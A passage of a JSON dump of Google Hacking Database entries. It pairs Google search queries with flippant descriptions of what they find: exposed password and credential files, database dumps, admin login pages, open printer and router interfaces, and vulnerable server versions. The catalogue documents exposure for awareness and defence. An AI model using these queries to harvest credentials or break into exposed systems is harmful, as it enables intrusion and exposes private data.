dangerous, especially if INTRANET users get logged... talk about mapping out an intranet quickly...thanks, sac =)" }, { "signatureReferenceNumber": "43", "link": "https://www.exploit-db.com/ghdb/43/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+haccess%2Ectl", "shortDescription": "haccess.ctl (one way)", "textualDescription": "this is the frontpage(?) equivalent of htaccess, I believe. Anyhow, this file describes who can access the directory of the web server and where the other authorization files are. nice find." }, { "signatureReferenceNumber": "44", "link": "https://www.exploit-db.com/ghdb/44/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=filetype%3Ahtaccess+Basic", "shortDescription": "haccess.ctl (VERY reliable)", "textualDescription": "haccess.ctl is the frontpage(?) equivalent of the .htaccess file. Either way, this file decribes who can access a web page, and should not be shown to web surfers. Way to go, googledork. =PThis method is very reliable due to the use of this google query:filetype:ctl BasicThis pulls out the file by name then searches for a string inside of it (Basic) which appears in the standard template for this file." }, { "signatureReferenceNumber": "45", "link": "https://www.exploit-db.com/ghdb/45/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Axls+username+password+email", "shortDescription": "filetype:xls username password email", "textualDescription": "This search shows Microsoft Excel spreadsheets containing the words username, password and email. Beware that there are a ton of blank \"template\" forms to weed through, but you can tell from the Google summary that some of these are winners... err losers.. depending on your perspective." }, { "signatureReferenceNumber": "46", "link": "https://www.exploit-db.com/ghdb/46/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=inurl%3Ashop+%22Hassan+Consulting%27s+Shopping+Cart+Version+1%2E18%22", "shortDescription": "Hassan Consulting's Shopping Cart Version 1.18", "textualDescription": "These servers can be messed with in many ways. One specific way is by way of the \"../\" bug. This lets you cruise around the web server in a somewhat limited fashion." }, { "signatureReferenceNumber": "47", "link": "https://www.exploit-db.com/ghdb/47/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=site%3Aedu+grades+admin", "shortDescription": "site:edu admin grades", "textualDescription": "I never really thought about this until I started coming up with juicy examples for DEFCON 11.. A few GLARINGLY bad examples contain not only student grades and names, but also social security numbers, securing the highest of all googledork ratings!" }, { "signatureReferenceNumber": "48", "link": "https://www.exploit-db.com/ghdb/48/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=allinurl%3Aauth_user_file.txt", "shortDescription": "auth_user_file.txt", "textualDescription": "DCForum's password file. This file gives a list of (crackable) passwords, usernames and email addresses for DCForum and for DCShop (a shopping cart program(!!!). Some lists are bigger than others, all are fun, and all belong to googledorks. =)" }, { "signatureReferenceNumber": "49", "link": "https://www.exploit-db.com/ghdb/49/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Aconfig%2Ephp+dbuname+dbpass", "shortDescription": "inurl:config.php dbuname dbpass", "textualDescription": "The old config.php script. This puppy should be held very closely. It should never be viewable to your web visitors because it contains CLEARTEXT usernames and passwords!The hishest of all googledorks ratings!" }, { "signatureReferenceNumber": "50", "link": "https://www.exploit-db.com/ghdb/50/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=inurl%3Atech%2Dsupport+inurl%3Ashow+Cisco", "shortDescription": "inurl:tech-support inurl:show Cisco", "textualDescription": "This is a way to find Cisco products with an open web interface. These are generally supposed to be user and password protected. Google finds ones that aren't. Be sure to use Google's cache if you have trouble connecting. Also, there are very few results (2 at the time of posting.)" }, { "signatureReferenceNumber": "51", "link": "https://www.exploit-db.com/ghdb/51/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=i%5Findex%2Eshtml+%22Ready%22", "shortDescription": "index_i.shtml Ready (Xerox printers on the web!)", "textualDescription": "These printers are not-only web-enabled, but their management interface somehow got crawled by google! These puppies should not be public! You can really muck with these printers. In some cases, going to the \"password.shtml\" page, you can even lock out the admins if a username and password has not already been set! Thanks to mephisteau@yahoo.co.uk for the idea =)" }, { "signatureReferenceNumber": "52", "link": "https://www.exploit-db.com/ghdb/52/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=aboutprinter.shtml&btnG=Google+Search", "shortDescription": "aboutprinter.shtml (More Xerox printers on the web!)", "textualDescription": "More Xerox printers on the web! Google found these printers. Should their management interface be open to the WHOLE INTERNET? I think not." }, { "signatureReferenceNumber": "53", "link": "https://www.exploit-db.com/ghdb/53/", "category": "Error Messages", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Chatologica+MetaSearch%22+%22stack+tracking%3A%22", "shortDescription": "\"Chatologica MetaSearch\" \"stack tracking\"", "textualDescription": "There is soo much crap in this error message... Apache version, CGI environment vars, path names, stack-freaking-dumps, process ID's, perl version, yadda yadda yadda..." }, { "signatureReferenceNumber": "54", "link": "https://www.exploit-db.com/ghdb/54/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=mystuff.xml+intitle:%22index+of%22", "shortDescription": "mystuff.xml - Trillian data files", "textualDescription": "This particular file contains web links that trillian users have entered into the tool. Trillian combines many different messaging programs into one tool. AIM, MSN, Yahoo, ICQ, IRC, etc. Although this particular file is fairly benign, check out the other files in the same directory. There is usually great stuff here!" }, { "signatureReferenceNumber": "55", "link": "https://www.exploit-db.com/ghdb/55/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22index+of%22+trillian.ini", "shortDescription": "trillian.ini", "textualDescription": "Trillian pulls together all sort of messaging clients like AIM MSN, Yahoo, IRC, ICQ, etc. The various ini files that trillian uses include files like aim.ini and msn.ini. These ini files contain encoded passwords, usernames, buddy lists, and all sorts of other fun things. Thanks for putting these on the web for us, googledorks!" }, { "signatureReferenceNumber": "56", "link": "https://www.exploit-db.com/ghdb/56/", "category": "Footholds", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=intitle%3Aadmin+intitle%3Alogin", "shortDescription": "intitle:admin intitle:login", "textualDescription": "Admin Login pages. Now, the existance of this page does not necessarily mean a server is vulnerable, but it sure is handy to let Google do the discovering for you, no? Let's face it, if you're trying to hack into a web server, this is one of the more obvious places to poke." }, { "signatureReferenceNumber": "57", "link": "https://www.exploit-db.com/ghdb/57/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&ie=UTF-8&oe=UTF-8&q=%22ORA-00921%3A+unexpected+end+of+SQL+command%22", "shortDescription": "ORA-00921: unexpected end of SQL command", "textualDescription": "Another SQL error message from Cesar. This one coughs up full web pathnames and/or php filenames." }, { "signatureReferenceNumber": "58", "link": "https://www.exploit-db.com/ghdb/58/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Apasslist.txt", "shortDescription": "passlist.txt (a better way)", "textualDescription": "Cleartext passwords. No decryption required!" }, { "signatureReferenceNumber": "59", "link": "https://www.exploit-db.com/ghdb/59/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:sitebuildercontent&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N", "shortDescription": "sitebuildercontent", "textualDescription": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?" }, { "signatureReferenceNumber": "60", "link": "https://www.exploit-db.com/ghdb/60/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:sitebuilderfiles&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N", "shortDescription": "sitebuilderfiles", "textualDescription": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?" }, { "signatureReferenceNumber": "61", "link": "https://www.exploit-db.com/ghdb/61/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=inurl:sitebuilderpictures&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=0&sa=N", "shortDescription": "sitebuilderpictures", "textualDescription": "This is a default directory for the sitebuilder web design software program. If these people posted web pages with default sitebuilder sirectory names, I wonder what else they got wrong?" }, { "signatureReferenceNumber": "62", "link": "https://www.exploit-db.com/ghdb/62/", "category": "Files containing passwords", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=filetype%3Ahtpasswd+htpasswd", "shortDescription": "htpasswd", "textualDescription": "This is a nifty way to find htpasswd files. Htpasswd files contain usernames and crackable passwords for web pages and directories. They're supposed to be server-side, not available to web clients! *duh*" }, { "signatureReferenceNumber": "63", "link": "https://www.exploit-db.com/ghdb/63/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22YaBB+SE+Dev+Team%22", "shortDescription": "\"YaBB SE Dev Team\"", "textualDescription": "Yet Another Bulletin Board (YABB) SE (versions 1.5.4 and 1.5.5 and perhaps others) contain an SQL injection vulnerability which may allow several attacks including unauthorized database modification or viewing. See http://www.securityfocus.com/bid/9674for more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others." }, { "signatureReferenceNumber": "64", "link": "https://www.exploit-db.com/ghdb/64/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3ACustva.asp+", "shortDescription": "EarlyImpact Productcart", "textualDescription": "The EarlyImpact Productcart contains multiple vulnerabilites, which could exploited to allow an attacker to steal user credentials or mount other attacks. See http://www.securityfocus.com/bid/9669 for more informationfor more information. Also see http://www.securityfocus.com/bid/9677for information about an information leakage vulnerability in versions YaBB Gold - Sp 1.3.1 and others." }, { "signatureReferenceNumber": "65", "link": "https://www.exploit-db.com/ghdb/65/", "category": "Advisories and Vulnerabilities", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Powered+by+mnoGoSearch+-+free+web+search+engine+software%22", "shortDescription": "mnGoSearch vulnerability", "textualDescription": "According to http://www.securityfocus.com/bid/9667, certain versions of mnGoSearch contain a buffer overflow vulnerability which allow an attacker to execute commands on the server." }, { "signatureReferenceNumber": "66", "link": "https://www.exploit-db.com/ghdb/66/", "category": "Error Messages", "querystring": "http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+inetmgr", "shortDescription": "IIS 4.0 error messages", "textualDescription": "IIS 4.0 servers. Extrememly old, incredibly easy to hack..." }, { "signatureReferenceNumber": "67", "link": "https://www.exploit-db.com/ghdb/67/", "category": "Error Messages", "querystring": "http://www.google.com/search?ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+%222004+microsoft+corporation%22", "shortDescription": "Windows 2000 web server error messages", "textualDescription": "Windows 2000 web servers. Aging, fairly easy to hack, especially out of the box..." }, { "signatureReferenceNumber": "68", "link": "https://www.exploit-db.com/ghdb/68/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22the+page+cannot+be+found%22+%22internet+information+services%22", "shortDescription": "IIS web server error messages", "textualDescription": "This query finds various types of IIS servers. This error message is fairly indicative of a somewhat unmodified IIS server, meaning it may be easier to break into..." }, { "signatureReferenceNumber": "69", "link": "https://www.exploit-db.com/ghdb/69/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&q=%22%23+phpMyAdmin+MySQL%2DDump%22+filetype%3Atxt", "shortDescription": "phpMyAdmin dumps", "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information..." }, { "signatureReferenceNumber": "70", "link": "https://www.exploit-db.com/ghdb/70/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=ISO-8859-1&safe=off&q=%22%23+phpMyAdmin+MySQL-Dump%22+%22INSERT+INTO%22+-%22the%22", "shortDescription": "phpMyAdmin dumps", "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but don't leave your database dumps laying around on the web. They contain all SORTS of sensitive information..." }, { "signatureReferenceNumber": "71", "link": "https://www.exploit-db.com/ghdb/71/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Gallery+in+Configuration+mode%22", "shortDescription": "Gallery in configuration mode", "textualDescription": "Gallery is a nice little php program that allows users to post personal pictures on their website. So handy, in fact, that I use it on my site! However, the Gallery configuration mode allows outsiders to make changes to your gallery. This is why you shouldn't leave your gallery in configuration mode. These people, unfortunately, have done just that!" }, { "signatureReferenceNumber": "72", "link": "https://www.exploit-db.com/ghdb/72/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+cgiirc%2Econfig%27", "shortDescription": "cgiirc.conf", "textualDescription": "CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!" }, { "signatureReferenceNumber": "73", "link": "https://www.exploit-db.com/ghdb/73/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3A%27cgiirc.config%27", "shortDescription": "cgiirc.conf", "textualDescription": "This is another less reliable way of finding the cgiirc.config file. CGIIRC is a web-based IRC client. Very cool stuff. The cgiirc.config file lists the options for this porgram, including the default sites that can be attached to, server passwords, and crypts of admin passwords. This file is for CGIIRC, not Google surfers!" }, { "signatureReferenceNumber": "74", "link": "https://www.exploit-db.com/ghdb/74/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.secrets+-history+-bugs", "shortDescription": "ipsec.secrets", "textualDescription": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!" }, { "signatureReferenceNumber": "75", "link": "https://www.exploit-db.com/ghdb/75/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.secrets+%22holds+shared+secrets%22", "shortDescription": "ipsec.secrets", "textualDescription": "from the manpage for ipsec_secrets: \"It is vital that these secrets be protected. The file should be owned by the super-user, and its permissions should be set to block all access by others.\" So let's make it plain: DO NOT SHOW THIS FILE TO ANYONE! Googledorks rejoice, these files are on the web!" }, { "signatureReferenceNumber": "76", "link": "https://www.exploit-db.com/ghdb/76/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=inurl%3Aipsec.conf+-intitle%3Amanpage", "shortDescription": "ipsec.conf", "textualDescription": "The ipsec.conf file could help hackers figure out what uber-secure users of freeS/WAN are protecting...." }, { "signatureReferenceNumber": "77", "link": "https://www.exploit-db.com/ghdb/77/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22500+Internal+Server+Error%22+%22server+at%22", "shortDescription": "Internal Server Error", "textualDescription": "This one shows the type of web server running on the site, and has the ability to show other information depending on how the message is internally formatted." }, { "signatureReferenceNumber": "78", "link": "https://www.exploit-db.com/ghdb/78/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22mySQL+error+with+query%22", "shortDescription": "mysql error with query", "textualDescription": "Another error message, this appears when an SQL query bails. This is a generic mySQL message, so there's all sort of information hackers can use, depending on the actual error message..." }, { "signatureReferenceNumber": "79", "link": "https://www.exploit-db.com/ghdb/79/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=ISO-8859-1&q=%22You+have+an+error+in+your+SQL+syntax+near%22", "shortDescription": "sQL syntax error", "textualDescription": "Another generic SQL message, this message can display path names and partial SQL code, both of which are very helpful for hackers..." }, { "signatureReferenceNumber": "80", "link": "https://www.exploit-db.com/ghdb/80/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22Supplied+argument+is+not+a+valid+MySQL+result+resource%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=90&sa=N", "shortDescription": "\"Supplied argument is not a valid MySQL result resource\"", "textualDescription": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "81", "link": "https://www.exploit-db.com/ghdb/81/", "category": "Error Messages", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22ORA%2D00936%3A+missing+expression%22", "shortDescription": "ORA-00936: missing expression", "textualDescription": "A generic ORACLE error message, this message can display path names, function names, filenames and partial database code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "82", "link": "https://www.exploit-db.com/ghdb/82/", "category": "Error Messages", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=%22ORA%2D00921%3A+unexpected+end+of+SQL+command%22", "shortDescription": "ORA-00921: unexpected end of SQL command", "textualDescription": "Another generic SQL message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "83", "link": "https://www.exploit-db.com/ghdb/83/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22ORA-00933%3A+SQL+command+not+properly+ended%22", "shortDescription": "\"ORA-00933: SQL command not properly ended\"", "textualDescription": "An Oracle error message, this message can display path names, function names, filenames and partial SQL code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "84", "link": "https://www.exploit-db.com/ghdb/84/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22Unclosed+quotation+mark+before+the+character+string%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=10&sa=N", "shortDescription": "\"Unclosed quotation mark before the character string\"", "textualDescription": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "85", "link": "https://www.exploit-db.com/ghdb/85/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22Incorrect+syntax+near%22&hl=en&lr=&ie=UTF-8&oe=UTF-8&start=90&sa=N", "shortDescription": "\"Incorrect syntax near\"", "textualDescription": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "86", "link": "https://www.exploit-db.com/ghdb/86/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Incorrect+syntax+near%22+-the", "shortDescription": "\"Incorrect syntax near\"", "textualDescription": "An SQL Server error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "87", "link": "https://www.exploit-db.com/ghdb/87/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22PostgreSQL+query+failed%3A++ERROR%3A++parser%3A+parse+error%22", "shortDescription": "\"PostgreSQL query failed: ERROR: parser: parse error\"", "textualDescription": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "88", "link": "https://www.exploit-db.com/ghdb/88/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22Supplied+argument+is+not+a+valid+PostgreSQL+result%22", "shortDescription": "supplied argument is not a valid PostgreSQL result", "textualDescription": "An PostgreSQL error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "89", "link": "https://www.exploit-db.com/ghdb/89/", "category": "Error Messages", "querystring": "http://www.google.com/search?q=%22Syntax+error+in+query+expression+%22+-the&hl=en&lr=&ie=UTF-8&oe=UTF-8", "shortDescription": "\"Syntax error in query expression \" -the", "textualDescription": "An Access error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "90", "link": "https://www.exploit-db.com/ghdb/90/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22An+illegal+character+has+been+found+in+the+statement%22+-%22previous+message%22", "shortDescription": "\"An illegal character has been found in the statement\" -\"previous message\"", "textualDescription": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "91", "link": "https://www.exploit-db.com/ghdb/91/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22A+syntax+error+has+occurred%22+filetype%3Aihtml", "shortDescription": "\"A syntax error has occurred\" filetype:ihtml", "textualDescription": "An Informix error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers" }, { "signatureReferenceNumber": "92", "link": "https://www.exploit-db.com/ghdb/92/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22detected+an+internal+error+%5BIBM%5D%5BCLI+Driver%5D%5BDB2%2F6000%5D%22", "shortDescription": "\"detected an internal error [IBM][CLI Driver][DB2/6000]\"", "textualDescription": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "93", "link": "https://www.exploit-db.com/ghdb/93/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=An+unexpected+token+%22END-OF-STATEMENT%22+was+found", "shortDescription": "An unexpected token \"END-OF-STATEMENT\" was found", "textualDescription": "A DB2 error message, this message can display path names, function names, filenames, partial code and program state, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "94", "link": "https://www.exploit-db.com/ghdb/94/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22statistics+of%22+%22advanced+web+statistics%22", "shortDescription": "intitle:\"statistics of\" \"advanced web statistics\"", "textualDescription": "the awstats program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, and more which can provide very interesting recon information for an attacker." }, { "signatureReferenceNumber": "95", "link": "https://www.exploit-db.com/ghdb/95/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Usage+Statistics+for%22+%22Generated+by+Webalizer%22", "shortDescription": "intitle:\"Usage Statistics for\" \"Generated by Webalizer\"", "textualDescription": "The webalizer program shows web statistics for web servers. This information includes who is visiting the site, what pages they visit, error codes produced, filetypes hosted on the server, number of hits, referrers, exit pages, and more which can provide very interesting recon information for an attacker." }, { "signatureReferenceNumber": "96", "link": "https://www.exploit-db.com/ghdb/96/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22robots%2Etxt%22+%2B+%22Disallow%3A%22+filetype%3Atxt", "shortDescription": "\"robots.txt\" \"Disallow:\" filetype:txt", "textualDescription": "The robots.txt file serves as a set of instructions for web crawlers. The \"disallow\" tag tells a web crawler where NOT to look, for whatever reason. Hackers will always go to those places first!" }, { "signatureReferenceNumber": "97", "link": "https://www.exploit-db.com/ghdb/97/", "category": "Error Messages", "querystring": "http://www.google.com/search?num=100&hl=en&lr=&ie=UTF-8&safe=off&q=%22Warning%3A+pg_connect%28%29%3A+Unable+to+connect+to+PostgreSQL+server%3A+FATAL%22", "shortDescription": "\"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL\"", "textualDescription": "This search reveals Postgresql servers in yet another way then we had seen before. Path information appears in the error message and sometimes database names." }, { "signatureReferenceNumber": "98", "link": "https://www.exploit-db.com/ghdb/98/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=%22phpMyAdmin%22+%22running+on%22+inurl%3A%22main.php%22&btnG=Google+Search", "shortDescription": "\"phpMyAdmin\" \"running on\" inurl:\"main.php\"", "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!" }, { "signatureReferenceNumber": "99", "link": "https://www.exploit-db.com/ghdb/99/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Amain.php+phpMyAdmin", "shortDescription": "inurl:main.php phpMyAdmin", "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!" }, { "signatureReferenceNumber": "100", "link": "https://www.exploit-db.com/ghdb/100/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&safe=off&q=inurl%3Amain.php+Welcome+to+phpMyAdmin", "shortDescription": "inurl:main.php Welcome to phpMyAdmin", "textualDescription": "From phpmyadmin.net : \"phpMyAdmin is a tool written in PHP intended to handle the administration of MySQL over the WWW.\" Great, easy to use, but lock it down! Things you can do include viewing MySQL runtime information and system variables, show processes, reloading MySQL, changing privileges, and modifying or exporting databases. Hacker-fodder for sure!" }, { "signatureReferenceNumber": "101", "link": "https://www.exploit-db.com/ghdb/101/", "category": "Error Messages", "querystring": "http://www.google.com/search?sourceid=navclient&ie=UTF-8&oe=UTF-8&q=%22Warning%3A+Cannot+modify+header+information+%2D+headers+already+sent%22", "shortDescription": "\"Warning: Cannot modify header information - headers already sent\"", "textualDescription": "A PHP error message, this message can display path names, function names, filenames and partial code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "102", "link": "https://www.exploit-db.com/ghdb/102/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?q=intitle:%22wbem%22+compaq+login+%22Compaq+Information+Technologies+Group%22&hl=en&lr=&c2coff=1&filter=0", "shortDescription": "intitle:\"wbem\" compaq login \"Compaq Information Technologies Group\"", "textualDescription": "These devices are running HP Insight Management Agents for Servers which \"provide device information for all managed subsystems. Alerts are generated by SNMP traps.\" The information on these pages include server addresses and other assorted SNMP information." }, { "signatureReferenceNumber": "103", "link": "https://www.exploit-db.com/ghdb/103/", "category": "Vulnerable Servers", "querystring": "http://www.google.com/search?q=intitle:osCommerce+inurl:admin+intext:%22redistributable+under+the+GNU%22intext:%22Online+Catalog%22+-demo+-site:oscommerce.com", "shortDescription": "intitle:osCommerce inurl:admin intext:\"redistributable under the GNU\"intext:\"Online Catalog\" -demo -site:oscommerce.com", "textualDescription": "This is a decent way to explore the admin interface of osCommerce e-commerce sites. Depending on how bad the setup of the web store is, web surfers can even Google their way into customer details and order status, all from the Google cache." }, { "signatureReferenceNumber": "104", "link": "https://www.exploit-db.com/ghdb/104/", "category": "Files containing juicy info", "querystring": "http://www.google.com/search?&ie=UTF-8&oe=UTF-8&q=intitle%3Aindex%2Eof+%22Apache%22+%22server+at%22", "shortDescription": "intitle:index.of \"Apache\" \"server at\"", "textualDescription": "This is a very basic string found on directory listing pages which show the version of the Apache web server. Hackers can use this information to find vulnerable targets without querying the servers." }, { "signatureReferenceNumber": "105", "link": "https://www.exploit-db.com/ghdb/105/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22access+denied+for+user%22+%22using+password%22", "shortDescription": "\"access denied for user\" \"using password\"", "textualDescription": "Another SQL error message, this message can display the username, database, path names and partial SQL code, all of which are very helpful for hackers..." }, { "signatureReferenceNumber": "106", "link": "https://www.exploit-db.com/ghdb/106/", "category": "Error Messages", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Under+construction%22+%22does+not+currently+have%22", "shortDescription": "intitle:\"Under construction\" \"does not currently have\"", "textualDescription": "This error message can be used to narrow down the operating system and web server version which can be used by hackers to mount a specific attack." }, { "signatureReferenceNumber": "107", "link": "https://www.exploit-db.com/ghdb/107/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=%22seeing+this+instead%22+intitle%3A%22test+page+for+apache%22", "shortDescription": "\"seeing this instead\" intitle:\"test page for apache\"", "textualDescription": "This is the default web page for Apache 1.3.11 - 1.3.26. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained." }, { "signatureReferenceNumber": "108", "link": "https://www.exploit-db.com/ghdb/108/", "category": "Web Server Detection", "querystring": "http://www.google.com/search?hl=en&lr=&ie=UTF-8&oe=UTF-8&q=intitle%3A%22Test+Page+for+Apache%22+%22It+Worked%21%22", "shortDescription": "intitle:\"Test Page for Apache\" \"It Worked!\"", "textualDescription": "This is the default web page for Apache 1.2.6 - 1.3.9. Hackers can use this information to determine the version of the web server, or to search Google for vulnerable targets. In addition, this indicates that the web server is not well maintained." }, { "signatureReferenceNumber": "109", "link": 